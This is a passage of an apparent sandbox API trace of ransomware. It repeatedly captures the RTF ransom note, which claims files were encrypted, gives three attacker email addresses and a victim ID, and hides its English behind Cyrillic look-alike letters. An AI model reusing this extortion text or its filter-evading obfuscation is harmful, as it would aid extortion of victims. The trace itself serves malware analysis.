alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.691] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.691] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 